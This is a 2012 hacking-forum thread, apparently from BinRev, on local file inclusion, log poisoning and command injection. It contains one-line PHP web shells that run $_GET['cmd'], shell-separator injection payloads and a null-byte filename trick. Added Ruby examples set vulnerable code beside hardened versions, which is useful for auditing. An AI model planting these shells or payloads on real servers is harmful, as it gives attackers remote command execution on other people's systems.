local file inclusion, log injection


3 replies to this topic

#1 I8igmac

I8igmac

    I broke 10 posts and all I got was this lousy title!

  • Members
  • 14 posts
  • Gender:Male

Posted 06 August 2012 - 12:10 AM

So I'm working on a project I plan to share once I have everything organized... There are a lot of tutorials out there but none have covered all scenarios.

What if log poisoning is possible but your typical <?php passthru();?> does not work...
What other methods can we attempt to achieve command execution...

So what else can we write to this log, Perl? Python? Ruby? Java?

#2 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,082 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 06 August 2012 - 03:04 AM

Here are some links that should prove useful:
https://www.golemtec...mmand-injection
http://www.blackhatl...mmand_Injection


Common practice is to use simple "fuzzing" techniques on public domain scripts and "inurl:" searches with Google or Bing.


It's really easy to write a Perl script looking for common vulns.

In Perl you want to look for stuff like:
open()
system()
exec()

Anything that passes commands to the operating system or uploads anything. Or even writes to, and names, a file. For example, if a script writes form data to a text file, then names the file something like <user name>.txt, you could try creating a user named pwner.php%00. If it's encoded and reading it terminates at the null string, it might execute. When the file is written and decoded it would be: pwner.php%00.txt.


To execute commands from POST and GET requests, it's common to use ";", "&&", "|", or even an encoded version of each: anything that will properly execute additional commands. Kind of like a UNION SELECT statement and commenting out the rest of the old SQL in MySQLi attacks.
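An added example (my code, not tekio's, and in Ruby rather than the Perl the post names so it can be run as-is) covering the two points above: why a ";", "&&" or "|" inside a decoded request parameter runs a second command when the parameter is interpolated into a shell string, why the argv form is immune, and what the "pwner.php%00" username turns into once it is decoded and wrapped into "<user name>.txt". The command is "echo" so everything runs offline, and the parameter strings are constructed for the example, not captured from any site.

```ruby
require "uri"

# Decode a GET/POST parameter the way the web stack does before the
# script sees it: "%3B" becomes ";", "+" a space, "%00" a NUL byte.
def decode_param(raw)
  URI.decode_www_form_component(raw)
end

# Vulnerable pattern, the Ruby equivalent of Perl's system("echo $user")
# or a two-argument open("... |"): the parameter is interpolated into a
# shell command line, so ";", "&&" and "|" start a second command.
def greet_vulnerable(name)
  `echo #{name}`
end

# Hardened pattern: argv form. No shell parses the line, so the
# separators are just bytes inside a single argument to echo.
def greet_safe(name)
  IO.popen(["echo", name], &:read)
end

# Try each separator (constructed, still URL-encoded, as sent on the
# wire) and return the ones that got "INJECTED" executed as its own
# command.
def injecting_payloads
  ["alice%3B+echo+INJECTED",       # alice; echo INJECTED
   "alice+%26%26+echo+INJECTED",   # alice && echo INJECTED
   "alice+%7C+echo+INJECTED"].select do |raw| # alice | echo INJECTED
    out = greet_vulnerable(decode_param(raw))
    out.lines.map(&:chomp).include?("INJECTED")
  end
end

# The file-naming trick from the post: the script writes "<user>.txt".
# A user named "pwner.php%00" decodes to "pwner.php\0.txt"; a C-level
# open() stops at the NUL and creates "pwner.php".
def data_filename(user)
  "#{decode_param(user)}.txt"
end

# Whether this runtime's filesystem calls refuse a path containing NUL.
# Ruby does (ArgumentError); a script that hands the bytes straight to
# libc does not, which is the case the trick relies on.
def filesystem_rejects_nul?(path)
  File.exist?(path)
  false
rescue ArgumentError
  true
end

# The check to put in front of the write: allowlist the characters a
# name may contain before it touches the filesystem.
def safe_data_filename(user)
  name = decode_param(user)
  unless name.match?(/\A[a-z0-9_]{1,32}\z/i)
    raise ArgumentError, "rejected username #{name.inspect}"
  end
  "#{name}.txt"
end

if $PROGRAM_NAME == __FILE__
  puts "payloads that injected: #{injecting_payloads.inspect}"
  p greet_safe("alice; echo INJECTED")
  p data_filename("pwner.php%00")
  puts "Ruby rejects NUL in path: #{filesystem_rejects_nul?(data_filename('pwner.php%00'))}"
end
```

The separator list is the one from the post; in the vulnerable function all three get "INJECTED" printed on its own line, while the argv version prints the whole parameter as one literal line. The NUL case is worth keeping in mind when auditing: a modern interpreter may reject the path for you, but the null-byte truncation still applies to anything that passes the name down to libc or to a separate C program.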

#3 VMw4r3

VMw4r3

    the 0ne

  • Members
  • 1 posts
  • Gender:Male

Posted 26 August 2012 - 11:12 AM

   <?php system($_GET['cmd']); ?>
   <?php exec($_GET['cmd']); ?> 
   <?php shell_exec($_GET['cmd']); ?>
   <?php passthru($_GET['cmd']); ?>

Or you could try using Fimap.py

http://code.google.com/p/fimap/

#4 systems_glitch

systems_glitch

    Dangerous free thinker

  • Moderating Team
  • 1,623 posts
  • Gender:Male

Posted 27 August 2012 - 08:41 AM

If searching for Ruby vulns, try to find anywhere `eval` is being used. Eval sends a string as a message to another object for creating dynamic code -- really useful, but really dangerous if you let unsanitized strings in. Also, apparently the ActiveRecord `order` method is vulnerable to SQL injection...so if that's being populated with a POST or GET, you can inject on it.

We've run into both of these at work.
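An added example (my code, not systems_glitch's, and not ActiveRecord's API) showing both patterns in plain Ruby: a settings lookup built with `eval`, where a ";" in the request parameter runs attacker code, beside the `public_send`-with-allowlist version; and an ORDER BY fragment built from a request parameter, which is what handing that parameter to an `order` call that accepts raw SQL amounts to, beside an allowlisted one. The settings object and the parameter values are constructed for the example; nothing here touches a database, it only shows the SQL string that would reach it.

```ruby
# Constructed stand-in for an application settings object; a real app
# would load these from a config file.
Settings = Struct.new(:timeout, :retries)
SETTINGS = Settings.new(30, 3)

# Set only if attacker-supplied code actually executes.
$injected = false

# Vulnerable: the setting name comes from a request parameter and is
# pasted into a string handed to eval. A ";" in the parameter ends the
# intended expression and starts the attacker's own statement.
def setting_vulnerable(key)
  eval("SETTINGS.#{key}")
end

ALLOWED_SETTINGS = %w[timeout retries].freeze

# Hardened: allowlist the name, then dispatch by name with public_send.
# Nothing in the parameter is ever parsed as Ruby code.
def setting_safe(key)
  unless ALLOWED_SETTINGS.include?(key)
    raise ArgumentError, "unknown setting #{key.inspect}"
  end
  SETTINGS.public_send(key)
end

# The same mistake in an ORDER BY: a raw request parameter interpolated
# into the SQL fragment, so a comma or subquery in it becomes SQL.
def order_vulnerable(sort)
  "ORDER BY #{sort}"
end

SORTABLE_COLUMNS = %w[name created_at].freeze

# Hardened: allowlist both the column and the direction; the returned
# fragment can only ever be one of four fixed strings.
def order_safe(column, direction)
  unless SORTABLE_COLUMNS.include?(column)
    raise ArgumentError, "bad column #{column.inspect}"
  end
  dir = direction.to_s.upcase
  unless %w[ASC DESC].include?(dir)
    raise ArgumentError, "bad direction #{direction.inspect}"
  end
  "ORDER BY #{column} #{dir}"
end

if $PROGRAM_NAME == __FILE__
  p setting_vulnerable("timeout")
  setting_vulnerable("timeout; $injected = true")   # constructed payload
  puts "attacker code ran: #{$injected}"
  p order_vulnerable("name, (SELECT password FROM users LIMIT 1)")
  p order_safe("created_at", "desc")
end
```

The eval case is the thing to grep for: any `eval`, `instance_eval` or `class_eval` whose string contains a request value is a code injection, not just a data problem, and the fix is to stop building code from strings rather than to sanitize them. For the `order` case the allowlist is the only reliable check, since the column list is small and known at development time.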



